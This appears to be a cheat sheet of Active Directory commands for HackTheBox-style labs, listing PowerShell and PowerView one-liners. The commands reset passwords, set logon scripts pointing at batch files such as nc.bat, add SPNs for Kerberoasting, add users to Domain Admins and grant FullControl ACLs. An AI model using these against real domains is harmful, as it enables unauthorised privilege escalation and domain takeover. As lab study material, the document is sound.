π©ββοΈActive Directory Commands
AD functions performed in different ways.
setadpassword
# MS AD Module
Set-ADAccountPassword -Identity smith -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)
setadattribute
# MS AD Module
Set-ADUser maria -scriptpath "C:\\programdata\\pc.bat"
Set-ADUser ShriyaB -replace @{'extensionAttribute1' = 'demo text'}
Set-ADUser -Identity maria -ServicePrincipalNames @{Add='MSSQLSvc/object.local:1433'}
# MS setspn.exe
setspn -a MSSQLSvc/object.local:1433 object.local\maria
# Powerview.ps1 Module
Set-DomainObject -Identity maria -SET @{scriptpath = "C:\\programdata\\nc.bat"}AddAdGroupMember
# MS AD Module
Add-ADGroupMember -Identity 'Domain Admins' -Members maria
# Powerview.ps1
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
# apt install samba
net rpc group members "Network Audit" -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htbSetAdObjectOwner
# MS AD Module
$user = new-object system.security.principal.ntaccount("htb.local\tom")
Get-ADGroup -filter 'name -like "Backup Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$acl.SetOwner($user);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}
# Powerview.ps1
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'
AddACLRights
# MS AD Module
$user = new-object system.security.principal.ntaccount("object\maria")
Get-ADGroup -filter 'name -like "Domain Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$ace = New-Object Security.AccessControl.ActiveDirectoryAccessRule('htb.local\Backup_Admins','FullControl');$acl.AddAccessRule($ace);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}
# Powerview.ps1
Add-DomainObjectAcl -TargetIdentity "Backup_Admins" -PrincipalIdentity claire -Rights AllLast updated